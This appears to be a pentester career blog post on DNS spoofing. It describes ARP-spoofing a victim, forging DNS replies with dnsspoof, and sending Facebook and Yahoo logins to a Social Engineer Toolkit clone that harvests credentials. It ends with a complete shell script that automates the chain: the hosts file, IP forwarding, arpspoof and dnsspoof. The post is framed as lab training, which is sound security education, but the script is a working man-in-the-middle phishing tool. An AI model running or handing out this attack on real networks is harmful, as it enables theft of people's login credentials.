Tips for an Information Security Analyst/Pentester career - Ep. 38: DNS Spoofing
This post is an ideal continuation of the previous episode but this time we're going to deal with DNS spoofing.
Once ARP spoofing has put us in the middle of the victim's traffic, we can answer the victim's DNS queries ourselves (DNS spoofing, a form of DNS poisoning) in order to redirect him/her to a fake website and grab his/her credentials.
Compared with the attack Georgia Weidman performs in her class, I brought this technique to the next level by creating a fake clone for Yahoo! through the Social Engineer Toolkit (credential harvester). I was then unsatisfied by the results and performed the same attack against Facebook, more successfully (view the embedded video for more details).
NOTE: Credential harvester will ask you to stop the Apache server, because it starts its own web server for the fake website on port 80.
You need to enter yes.
An Apache instance bound to that same port would prevent our malicious clone from starting.
In her class, Georgia doesn't create a clone, but I did it here.
Of course, the concept is exactly the same; by this I surely don't mean any disrespect to, or belittling of, Georgia's amazing work.
For the purpose of this attack, I created a text file called hosts.txt where I stored two manual entries, for login.yahoo.com and for www.facebook.com, matching them with the IP address of my Kali VM (192.168.1.92). The file uses the same format as /etc/hosts (IP address, whitespace, hostname, one entry per line); dnsspoof matches bare hostnames, not URLs, so there is no https:// scheme in the entries, and a '*' wildcard such as *.facebook.com is accepted.
As we did for ARP spoofing, we need to make sure the traffic we intercept on behalf of the victim is forwarded on to its real destination, otherwise we would cause a denial of service instead of a transparent man-in-the-middle.
For this purpose, we need to write 1 (forwarding on) to /proc/sys/net/ipv4/ip_forward, whose default value is 0 (forwarding off).
Then we need to perform an ARP spoofing attack between the router (or gateway) and our target machine. We're going to use the same command as before (arpspoof -i <network interface to use> -t <target IP address> <IP address we want to impersonate>), this time with the IP address of the target machine as the target and the IP address of the router as the address to impersonate, so that the victim sends its DNS queries through us.
That being done, we'll perform the DNS spoofing attack by launching the following command: dnsspoof -i <name of the interface> -f <malicious hosts file>. dnsspoof sniffs the DNS queries passing through our machine and, for every name that matches an entry in the hosts file, sends a forged reply pointing at our IP before the real resolver's answer arrives.
In our case, it'll look like this:
As a result of this attack, we could successfully grab the victim's credentials from the Facebook clone (of course, it's a mere example, as I don't have any Facebook account).
The beauty of all this is that the process is largely transparent to the user on the target machine: the browser displays the expected hostname, since it was the name resolution that was forged. Two caveats apply, though. The clone runs over plain HTTP on port 80 and cannot present a valid certificate, so a victim who types https:// or whose browser has HSTS cached for the site gets a browser error rather than the fake page. And the ARP spoofing itself is visible to anyone looking: the gateway's MAC address changes in the victim's ARP cache, and tools such as arpwatch alert on exactly that.
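The complete procedure from above (hosts file, IP forwarding, arpspoof, dnsspoof) as one script. This is an added example, not a script from the original post or from dsniff: it assumes the dsniff tools are installed, that the interface, victim and gateway addresses are passed as arguments, and it reuses the post's attacker address 192.168.1.92 and the two hostnames. Set DRY_RUN=1 to print the privileged commands instead of running them.

```shell
#!/bin/sh
# Added example (not from the original post). Builds the dnsspoof hosts
# file, enables IP forwarding, ARP-spoofs the victim and starts dnsspoof.
# Assumes arpspoof/dnsspoof from dsniff are installed and that we run as
# root; DRY_RUN=1 only echoes the privileged commands.
set -u

ATTACKER_IP="${ATTACKER_IP:-192.168.1.92}"   # Kali VM address used in the post
HOSTS_FILE="${HOSTS_FILE:-hosts.txt}"

# Accept only dotted-quad IPv4 addresses with every octet in 0..255.
valid_ipv4() {
  local ip="$1" octet
  local IFS='.'
  set -- $ip
  [ $# -eq 4 ] || return 1
  for octet in "$@"; do
    case "$octet" in
      ''|*[!0-9]*) return 1 ;;
    esac
    [ "$octet" -le 255 ] || return 1
  done
  return 0
}

# Print a dnsspoof hosts file: hosts(5) format, "IP<tab>hostname" per line.
# dnsspoof matches hostnames (with optional '*' wildcards), never URLs, so
# an entry carrying a scheme such as https:// is rejected here.
build_hosts_file() {
  local ip="$1"; shift
  valid_ipv4 "$ip" || { echo "bad IPv4 address: $ip" >&2; return 1; }
  local name
  for name in "$@"; do
    case "$name" in
      *://*) echo "hostname only, no URL scheme: $name" >&2; return 1 ;;
    esac
    printf '%s\t%s\n' "$ip" "$name"
  done
}

# Run a command, or just show it when DRY_RUN=1.
run() {
  if [ "${DRY_RUN:-0}" = 1 ]; then echo "+ $*"; else "$@"; fi
}

main() {
  iface="$1"; victim="$2"; gateway="$3"
  build_hosts_file "$ATTACKER_IP" login.yahoo.com www.facebook.com > "$HOSTS_FILE" || exit 1
  # Forward the victim's traffic on; without this the MITM becomes a DoS.
  run sh -c 'echo 1 > /proc/sys/net/ipv4/ip_forward'
  # Tell the victim that we are the gateway, so its DNS queries pass through us.
  run arpspoof -i "$iface" -t "$victim" "$gateway" &
  # Answer queries for the names in HOSTS_FILE with our address.
  run dnsspoof -i "$iface" -f "$HOSTS_FILE"
}

# Usage: DRY_RUN=1 sh dnsspoof-attack.sh eth0 <victim IP> <gateway IP>
if [ $# -eq 3 ]; then
  main "$@"
fi
```

The hostnames and the attacker address are the ones the post uses; swap them for your own lab's values. The script only ARP-spoofs the victim side, which is all dnsspoof needs, because it only has to see the victim's outgoing queries.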
Episode 39
Episode 37